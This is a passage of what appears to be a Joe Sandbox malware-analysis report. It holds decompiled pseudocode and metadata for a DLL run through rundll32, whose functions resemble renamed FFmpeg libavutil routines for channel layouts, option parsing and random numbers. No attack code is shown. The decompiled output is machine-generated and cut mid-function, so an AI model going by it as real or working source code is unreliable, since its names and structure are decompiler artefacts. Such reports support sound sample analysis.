0x0f0f0f0f) >> 0x00000008) & 0x0000003f))]);
                                                      								goto L74;
                                                      							} else {
                                                      								_t332 = _t353[8];
                                                      								if(_t192 != 2) {
                                                      									_t435[5] = 0x29a;
                                                      									_t435[1] = 0;
                                                      									 *_t435 = 0;
                                                      									_t435[4] = "libavutil/channel_layout.c";
                                                      									_t435[3] = "channel_layout->order == AV_CHANNEL_ORDER_CUSTOM";
                                                      									_t435[2] = "Assertion %s failed at %s:%d\n";
                                                      									L10023A40();
                                                      									L1009DB98();
                                                      									_t438 = _t435 - 0x41c;
                                                      									 *((intOrPtr*)(_t438 + 0x418)) = _t273;
                                                      									_t238 =  *((intOrPtr*)(_t438 + 0x424));
                                                      									_t379 =  *((intOrPtr*)(_t438 + 0x428));
                                                      									if(_t238 != 0 || _t379 == 0) {
                                                      										 *((intOrPtr*)(_t438 + 8)) = _t379;
                                                      										_t285 = _t438 + 0x10;
                                                      										 *((intOrPtr*)(_t438 + 4)) = _t238;
                                                      										 *_t438 = _t285;
                                                      										L100089A0();
                                                      										 *((intOrPtr*)(_t438 + 4)) = _t285;
                                                      										 *_t438 =  *((intOrPtr*)(_t438 + 0x420));
                                                      										_t241 = E1000D4D0(_t285, _t390, _t403);
                                                      										if(_t241 >= 0) {
                                                      											_t241 =  *((intOrPtr*)(_t438 + 0x14));
                                                      										}
                                                      									} else {
                                                      										_t241 = 0xffffffea;
                                                      									}
                                                      									return _t241;
                                                      								} else {
                                                      									_t420 = _t353[4];
                                                      									_t380 = 0;
                                                      									_t280 = 0xffffffff;
                                                      									if(_t420 > 0) {
                                                      										do {
                                                      											_t206 =  *_t332 - 0x400;
                                                      											if(_t206 > 0x3ff) {
                                                      												goto L67;
                                                      											} else {
                                                      												if(_t380 > 0) {
                                                      													if( *((intOrPtr*)(_t332 - 0x18)) - 0x400 > 0x3ff || _t206 != _t380) {
                                                      														goto L72;
                                                      													} else {
                                                      														goto L66;
                                                      													}
                                                      												} else {
                                                      													if(_t206 > 0x3ff) {
                                                      														goto L67;
                                                      													} else {
                                                      														if(_t206 == _t380) {
                                                      															L66:
                                                      															_t280 = _t380;
                                                      															goto L67;
                                                      														} else {
                                                      															goto L72;
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      											goto L91;
                                                      											L67:
                                                      											_t380 =  &(_t380[1]);
                                                      											_t332 = _t332 + 0x18;
                                                      										} while (_t380 != _t420);
                                                      										L74:
                                                      										if(_t280 < 0) {
                                                      											goto L72;
                                                      										} else {
                                                      											asm("pxor xmm0, xmm0");
                                                      											asm("cvtsi2sd xmm0, ebx");
                                                      											asm("sqrtsd xmm0, xmm0");
                                                      											asm("cvttsd2si eax, xmm0");
                                                      											_t406 =  &(_t206[1]) *  &(_t206[1]);
                                                      											if(_t406 !=  &(_t280[1])) {
                                                      												goto L72;
                                                      											} else {
                                                      												_t435[2] = _t206;
                                                      												_t435[1] = "ambisonic %d";
                                                      												 *_t435 = _t390;
                                                      												L100089C0();
                                                      												_t329 = _t428[4];
                                                      												if(_t329 > _t406) {
                                                      													_t211 = 0;
                                                      													do {
                                                      														 *((intOrPtr*)(_t435 + _t211 + 0x28)) = 0;
                                                      														 *((intOrPtr*)(_t435 + _t211 + 0x2c)) = 0;
                                                      														_t211 = _t211 + 8;
                                                      													} while (_t211 < 0x18);
                                                      													if( *_t428 == 3) {
                                                      														_t330 = _t428[8];
                                                      														_t435[0xa] = 1;
                                                      														_t284 = _t428[0xc];
                                                      														_t435[0xc] = _t330;
                                                      														_t435[0xd] = _t284;
                                                      														_t227 = (((_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 8);
                                                      														_t406 = _t227 >> 0x10;
                                                      														_t435[0xb] = ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) + ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) + ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) + ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) >> 0x00000010) & 0x0000003f) + (_t227 + (_t227 >> 0x00000010) & 0x0000003f);
                                                      													} else {
                                                      														_t284 = 2;
                                                      														_t435[0xa] = 2;
                                                      														_t435[0xb] = _t329 - _t406;
                                                      														_t435[0xc] = _t428[8] + (_t406 + _t406 * 2) * 8;
                                                      													}
                                                      													 *_t435 = _t390;
                                                      													_t435[2] = 1;
                                                      													_t435[1] = 0x2b;
                                                      													L10008D20();
                                                      													_t435[1] = _t390;
                                                      													 *_t435 =  &(_t435[0xa]);
                                                      													E1000D4D0(_t284, _t390, _t406);
                                                      												}
                                                      												return 0;
                                                      											}
                                                      										}
                                                      									} else {
                                                      										L72:
                                                      										return 0xffffffea;
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      					} else {
                                                      						if(_t142 == 0) {
                                                      							_t148 = _t423[4];
                                                      							goto L59;
                                                      						} else {
                                                      							_t421 = _t423[8];
                                                      							_t243 = 4;
                                                      							_t333 = 0;
                                                      							_t289 = _t423[0xc];
                                                      							_t381 = 0;
                                                      							while((_t333 ^ _t289 | _t243 ^ _t421) != 0) {
                                                      								_t381 =  &(1[_t381]);
                                                      								if(_t381 == 0x1f) {
                                                      									L14:
                                                      									_t145 = _t423[4];
                                                      									if(_t145 != 0) {
                                                      										_t432[2] = _t145;
                                                      										_t432[1] = "%d channels (";
                                                      										 *_t432 = _t432[6];
                                                      										L100089C0();
                                                      										_t395 = _t423[4];
                                                      										if(_t395 > 0) {
                                                      											_t425 = 0;
                                                      											_t386 = _t423;
                                                      											goto L19;
                                                      											do {
                                                      												do {
                                                      													L19:
                                                      													if(_t425 >= _t395) {
                                                      														L57:
                                                      														_t432[1] = 0x100aeacf;
                                                      														 *_t432 = _t432[6];
                                                      														L100089C0();
                                                      														goto L24;
                                                      													} else {
                                                      														_t160 =  *_t386;
                                                      														if(_t160 == 2) {
                                                      															_t292 =  *(_t386[8] + (_t425 + _t425 * 2) * 8);
                                                      															_t250 = _t292 - 0x400;
                                                      															if(_t425 != 0) {
                                                      																_t432[4] = _t292;
                                                      																_t432[1] = 0x100aeacf;
                                                      																 *_t432 = _t432[6];
                                                      																L100089C0();
                                                      																_t292 = _t432[4];
                                                      															}
                                                      															if(_t250 > 0x3ff) {
                                                      																goto L53;
                                                      															} else {
                                                      																goto L51;
                                                      															}
                                                      														} else {
                                                      															if(_t160 == 3) {
                                                      																_t178 = _t386[8];
                                                      																_t432[4] = _t178;
                                                      																_t432[5] = _t386[0xc];
                                                      																_t397 = _t395 - (((((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000008) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000010) + (((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000008) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) & 0x0000003f) + ((((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) + (((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 
0x00000008) >> 0x00000010) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) + (((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000008) & 0x0000003f);
                                                      																_t272 = _t425 - _t397;
                                                      																if(_t425 >= _t397) {
                                                      																	goto L32;
                                                      																} else {
                                                      																	_t250 = 0;
                                                      																	if(_t425 == 0) {
                                                      																		L51:
                                                      																		_t432[2] = _t250;
                                                      																		_t432[1] = "AMBI%d";
                                                      																		 *_t432 = _t432[6];
                                                      																		L100089C0();
                                                      																	} else {
                                                      																		_t250 = _t425;
                                                      																		_t432[1] = 0x100aeacf;
                                                      																		_t64 = _t425 + 0x400; // 0x401
                                                      																		_t432[4] = _t64;
                                                      																		 *_t432 = _t432[6];
                                                      																		L100089C0();
                                                      																		_t292 = _t432[4];
                                                      																		if(_t425 <= 0x3ff) {
                                                      																			goto L51;
                                                      																		} else {
                                                      																			goto L47;
                                                      																		}
                                                      																	}
                                                      																}
                                                      															} else {
                                                      																if(_t160 == 1) {
                                                      																	_t272 = _t425;
                                                      																	_t432[4] = _t386[8];
                                                      																	_t432[5] = _t386[0xc];
                                                      																	L32:
                                                      																	_t432[7] = _t425;
                                                      																	_t182 = _t432[4];
                                                      																	_t292 = 0;
                                                      																	_t351 = _t432[5];
                                                      																	_t426 = _t386;
                                                      																	do {
                                                      																		_t387 = _t351;
                                                      																		_t399 = (_t387 << 0x00000020 | _t182) >> _t292;
                                                      																		_t388 = _t387 >> _t292;
                                                      																		if((_t292 & 0x00000020) != 0) {
                                                      																			_t399 = _t388;
                                                      																		}
                                                      																		if((_t399 & 0x00000001) == 0) {
                                                      																			goto L34;
                                                      																		} else {
                                                      																			_t49 = _t272 - 1; // 0x0
                                                      																			_t402 = _t49;
                                                      																			if(_t272 != 0) {
                                                      																				_t272 = _t402;
                                                      																				goto L34;
                                                      																			} else {
                                                      																				_t386 = _t426;
                                                      																				_t425 = _t432[7];
                                                      																				if(_t425 != 0) {
                                                      																					_t432[4] = _t292;
                                                      																					_t432[1] = 0x100aeacf;
                                                      																					 *_t432 = _t432[6];
                                                      																					L100089C0();
                                                      																					_t292 = _t432[4];
                                                      																					L53:
                                                      																					if(_t292 <= 0x28) {
                                                      																						goto L41;
                                                      																					} else {
                                                      																						if(_t292 != 0xffffffff) {
                                                      																							goto L47;
                                                      																						} else {
                                                      																							goto L24;
                                                      																						}
                                                      																					}
                                                      																				} else {
                                                      																					if(_t292 > 0x28) {
                                                      																						L47:
                                                      																						_t432[2] = _t292;
                                                      																						_t432[1] = "USR%d";
                                                      																						 *_t432 = _t432[6];
                                                      																						L100089C0();
                                                      																					} else {
                                                      																						L41:
                                                      																						_t163 =  *(0x100af280 + _t292 * 8);
                                                      																						if(_t163 == 0) {
                                                      																							goto L47;
                                                      																						} else {
                                                      																							_t432[2] = _t163;
                                                      																							_t432[1] = "%s";
                                                      																							 *_t432 = _t432[6];
                                                      																							L100089C0();
                                                      																						}
                                                      																					}
                                                      																				}
                                                      																			}
                                                      																		}
                                                      																		goto L25;
                                                      																		L34:
                                                      																		_t292 =  &(1[_t292]);
                                                      																	} while (_t292 != 0x40);
                                                      																	_t386 = _t426;
                                                      																	_t425 = _t432[7];
                                                      																	if(_t425 == 0) {
                                                      																		goto L24;
                                                      																	} else {
                                                      																		goto L57;
                                                      																	}
                                                      																	goto L29;
                                                      																} else {
                                                      																	if(_t425 != 0) {
                                                      																		goto L57;
                                                      																	}
                                                      																	L24:
                                                      																	_t432[1] = "NONE";
                                                      																	 *_t432 = _t432[6];
                                                      																	L100089C0();
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      													L25:
                                                      													if( *_t386 != 2) {
                                                      														goto L18;
                                                      													} else {
                                                      														_t341 = _t386[8];
                                                      														_t166 = _t425 + _t425 * 2;
                                                      														_t293 = _t341 + _t166 * 8;
                                                      														if( *((char*)(_t341 + 4 + _t166 * 8)) == 0) {
                                                      															goto L18;
                                                      														} else {
                                                      															goto L27;
                                                      														}
                                                      													}
                                                      													goto L29;
                                                      													L27:
                                                      													_t425 =  &(1[_t425]);
                                                      													_t432[2] = _t293 + 4;
                                                      													_t432[1] = "@%s";
                                                      													 *_t432 = _t432[6];
                                                      													L100089C0();
                                                      													_t395 = _t386[4];
                                                      												} while (_t395 > _t425);
                                                      												goto L29;
                                                      												L18:
                                                      												_t395 = _t386[4];
                                                      												_t425 =  &(1[_t425]);
                                                      											} while (_t395 > _t425);
                                                      										}
                                                      										L29:
                                                      										if(_t395 == 0) {
                                                      											goto L15;
                                                      										} else {
                                                      											_t432[1] = 0x100aead1;
                                                      											 *_t432 = _t432[6];
                                                      											L100089C0();
                                                      											_t144 = 0;
                                                      										}
                                                      									} else {
                                                      										L15:
                                                      										_t148 = 0;
                                                      										L59:
                                                      										_t432[2] = _t148;
                                                      										_t432[1] = "%d channels";
                                                      										 *_t432 = _t432[6];
                                                      										L100089C0();
                                                      										_t144 = 0;
                                                      									}
                                                      								} else {
                                                      									_t337 = _t381 << 5;
                                                      									_t6 = _t337 + 0x100aec90; // 0x0
                                                      									_t243 =  *_t6;
                                                      									_t7 = _t337 + 0x100aec94; // 0x0
                                                      									_t333 =  *_t7;
                                                      									continue;
                                                      								}
                                                      								goto L12;
                                                      							}
                                                      							_t382 = _t381 << 5;
                                                      							_t432[1] = "%s";
                                                      							_t9 = _t382 + 0x100aec80; // 0x100aeabb
                                                      							_t432[2] =  *_t9;
                                                      							 *_t432 = _t432[6];
                                                      							L100089C0();
                                                      							L8:
                                                      							_t144 = 0;
                                                      						}
                                                      						L12:
                                                      						return _t144;
                                                      					}
                                                      				}
                                                      				L91:
                                                      			}
                                                      0x1000da47
                                                      0x1000da4b
                                                      0x1000da4e
                                                      0x1000da53
                                                      0x1000da58
                                                      0x1000da5c
                                                      0x1000da5e
                                                      0x1000da5e
                                                      0x1000da62
                                                      0x1000da66
                                                      0x1000da69
                                                      0x1000da72
                                                      0x1000dac8
                                                      0x1000dad0
                                                      0x1000dad4
                                                      0x1000dad7
                                                      0x1000dadf
                                                      0x1000db44
                                                      0x1000db4f
                                                      0x1000db5c
                                                      0x1000da74
                                                      0x1000da7a
                                                      0x1000da7f
                                                      0x1000da85
                                                      0x1000da8c
                                                      0x1000da8c
                                                      0x1000da90
                                                      0x1000da9d
                                                      0x1000daa1
                                                      0x1000daa5
                                                      0x1000daae
                                                      0x1000dab2
                                                      0x1000dab5
                                                      0x1000dab5
                                                      0x1000dac3
                                                      0x1000dac3
                                                      0x1000da38
                                                      0x1000d93c
                                                      0x1000d982
                                                      0x1000d98e
                                                      0x1000d98e
                                                      0x1000d93a
                                                      0x1000d928
                                                      0x1000d920
                                                      0x1000d4f1
                                                      0x1000d4f3
                                                      0x1000d8e0
                                                      0x00000000
                                                      0x1000d4f9
                                                      0x1000d4f9
                                                      0x1000d4fc
                                                      0x1000d501
                                                      0x1000d503
                                                      0x1000d506
                                                      0x1000d527
                                                      0x1000d510
                                                      0x1000d514
                                                      0x1000d58f
                                                      0x1000d58f
                                                      0x1000d594
                                                      0x1000d59d
                                                      0x1000d5aa
                                                      0x1000d5ae
                                                      0x1000d5b1
                                                      0x1000d5b6
                                                      0x1000d5bb
                                                      0x1000d5c5
                                                      0x1000d5c7
                                                      0x1000d5c9
                                                      0x1000d5dc
                                                      0x1000d5dc
                                                      0x1000d5dc
                                                      0x1000d5de
                                                      0x1000d8be
                                                      0x1000d8c3
                                                      0x1000d8cb
                                                      0x1000d8ce
                                                      0x00000000
                                                      0x1000d5e4
                                                      0x1000d5e4
                                                      0x1000d5e9
                                                      0x1000d82c
                                                      0x1000d82e
                                                      0x1000d834
                                                      0x1000d836
                                                      0x1000d83f
                                                      0x1000d847
                                                      0x1000d84a
                                                      0x1000d84f
                                                      0x1000d84f
                                                      0x1000d859
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1000d5ef
                                                      0x1000d5f2
                                                      0x1000d720
                                                      0x1000d726
                                                      0x1000d72e
                                                      0x1000d7b9
                                                      0x1000d7bb
                                                      0x1000d7bf
                                                      0x00000000
                                                      0x1000d7c5
                                                      0x1000d7c5
                                                      0x1000d7c9
                                                      0x1000d85b
                                                      0x1000d85b
                                                      0x1000d864
                                                      0x1000d86c
                                                      0x1000d86f
                                                      0x1000d7cf
                                                      0x1000d7d4
                                                      0x1000d7d6
                                                      0x1000d7de
                                                      0x1000d7e4
                                                      0x1000d7e8
                                                      0x1000d7eb
                                                      0x1000d7f6
                                                      0x1000d7fa
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1000d7fa
                                                      0x1000d7c9
                                                      0x1000d5f8
                                                      0x1000d5f9
                                                      0x1000d68b
                                                      0x1000d690
                                                      0x1000d694
                                                      0x1000d698
                                                      0x1000d698
                                                      0x1000d69c
                                                      0x1000d6a0
                                                      0x1000d6a2
                                                      0x1000d6a6
                                                      0x1000d6bc
                                                      0x1000d6bc
                                                      0x1000d6c0
                                                      0x1000d6c3
                                                      0x1000d6c8
                                                      0x1000d6ca
                                                      0x1000d6ca
                                                      0x1000d6d2
                                                      0x00000000
                                                      0x1000d6d4
                                                      0x1000d6d4
                                                      0x1000d6d4
                                                      0x1000d6d9
                                                      0x1000d6b0
                                                      0x00000000
                                                      0x1000d6db
                                                      0x1000d6db
                                                      0x1000d6dd
                                                      0x1000d6e3
                                                      0x1000d879
                                                      0x1000d882
                                                      0x1000d88a
                                                      0x1000d88d
                                                      0x1000d892
                                                      0x1000d896
                                                      0x1000d899
                                                      0x00000000
                                                      0x1000d89f
                                                      0x1000d8a2
                                                      0x00000000
                                                      0x1000d8a8
                                                      0x00000000
                                                      0x1000d8a8
                                                      0x1000d8a2
                                                      0x1000d6e9
                                                      0x1000d6ec
                                                      0x1000d800
                                                      0x1000d800
                                                      0x1000d80d
                                                      0x1000d811
                                                      0x1000d814
                                                      0x1000d6f2
                                                      0x1000d6f2
                                                      0x1000d6f2
                                                      0x1000d6fb
                                                      0x00000000
                                                      0x1000d701
                                                      0x1000d701
                                                      0x1000d70a
                                                      0x1000d712
                                                      0x1000d715
                                                      0x1000d715
                                                      0x1000d6fb
                                                      0x1000d6ec
                                                      0x1000d6e3
                                                      0x1000d6d9
                                                      0x00000000
                                                      0x1000d6b2
                                                      0x1000d6b2
                                                      0x1000d6b3
                                                      0x1000d8b0
                                                      0x1000d8b2
                                                      0x1000d8b8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1000d5ff
                                                      0x1000d601
                                                      0x00000000
                                                      0x00000000
                                                      0x1000d607
                                                      0x1000d610
                                                      0x1000d614
                                                      0x1000d617
                                                      0x1000d617
                                                      0x1000d5f9
                                                      0x1000d5f2
                                                      0x1000d5e9
                                                      0x1000d620
                                                      0x1000d623
                                                      0x00000000
                                                      0x1000d625
                                                      0x1000d625
                                                      0x1000d628
                                                      0x1000d631
                                                      0x1000d634
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1000d634
                                                      0x00000000
                                                      0x1000d636
                                                      0x1000d63d
                                                      0x1000d63e
                                                      0x1000d647
                                                      0x1000d64b
                                                      0x1000d64e
                                                      0x1000d653
                                                      0x1000d656
                                                      0x00000000
                                                      0x1000d5d0
                                                      0x1000d5d0
                                                      0x1000d5d3
                                                      0x1000d5d4
                                                      0x1000d5dc
                                                      0x1000d660
                                                      0x1000d662
                                                      0x00000000
                                                      0x1000d668
                                                      0x1000d671
                                                      0x1000d675
                                                      0x1000d678
                                                      0x1000d67d
                                                      0x1000d67d
                                                      0x1000d596
                                                      0x1000d596
                                                      0x1000d596
                                                      0x1000d8e3
                                                      0x1000d8e3
                                                      0x1000d8ec
                                                      0x1000d8f4
                                                      0x1000d8f7
                                                      0x1000d8fc
                                                      0x1000d8fc
                                                      0x1000d516
                                                      0x1000d518
                                                      0x1000d51b
                                                      0x1000d51b
                                                      0x1000d521
                                                      0x1000d521
                                                      0x00000000
                                                      0x1000d521
                                                      0x00000000
                                                      0x1000d514
                                                      0x1000d52f
                                                      0x1000d537
                                                      0x1000d53b
                                                      0x1000d541
                                                      0x1000d549
                                                      0x1000d54c
                                                      0x1000d551
                                                      0x1000d551
                                                      0x1000d551
                                                      0x1000d575
                                                      0x1000d57c
                                                      0x1000d57c
                                                      0x1000d4ef
                                                      0x00000000

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_bprintf
                                                      • String ID: %d channels$%d channels ($@%s$AMBI%d$NONE$USR%d
                                                      • API String ID: 3083893021-1306170362
                                                      • Opcode ID: efc4cf4070b613ff96981b1c53d9dde21975b7a6fb51727448d4ce29c3f6a9dc
                                                      • Instruction ID: a65011a6159dd3c9d8d2b84384c130b43f4f86832dc80880a9240f1aa98400e9
                                                      • Opcode Fuzzy Hash: efc4cf4070b613ff96981b1c53d9dde21975b7a6fb51727448d4ce29c3f6a9dc
                                                      • Instruction Fuzzy Hash: E6B1A675A087468BD704EF68C48062EB7E1FF98394F15882EE989C7345EB31ED44CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Crypt$AlgorithmProvider_close_readmvpriv_open$CloseOpenRandomclock
                                                      • String ID: Microsoft Primitive Provider$N$RNG
                                                      • API String ID: 4139849330-2077157618
                                                      • Opcode ID: 18afe3c33630559fbd0355b581881ae8f3aa94268538246d15ca1b824b2066d5
                                                      • Instruction ID: 296a7b6315f8af7d09067326692401f592c87ee6f10d7706e56fdac5cef6b261
                                                      • Opcode Fuzzy Hash: 18afe3c33630559fbd0355b581881ae8f3aa94268538246d15ca1b824b2066d5
                                                      • Instruction Fuzzy Hash: 55918E75A093108FE304EF38C9C061ABBE2EFC9312F95893EE9889B355E675D944CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_opt_find2
                                                      • String ID: %d%*1[:/]%d%c$-$9$The "%s" option is deprecated: %s$Unable to parse option value "%s"$all$const_values array too small for %s$default$max$min$none
                                                      • API String ID: 2189843566-2859375014
                                                      • Opcode ID: 730b512ef01ecd7330cf6e3f59345523149cc4a393a05c55e320839346850f87
                                                      • Instruction ID: 478a8a207ff5b5307f9cfef852e9a26e9f05da79b4c8f966c849b1b138e3b10c
                                                      • Opcode Fuzzy Hash: 730b512ef01ecd7330cf6e3f59345523149cc4a393a05c55e320839346850f87
                                                      • Instruction Fuzzy Hash: CF023475A087498FC390DF69D08065BFBE5FFC9350F918A2EE9D987250EB35D8448B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E100132D0() {
                                                      				void* _t43;
                                                      				intOrPtr _t61;
                                                      				intOrPtr _t63;
                                                      				intOrPtr _t65;
                                                      				intOrPtr _t67;
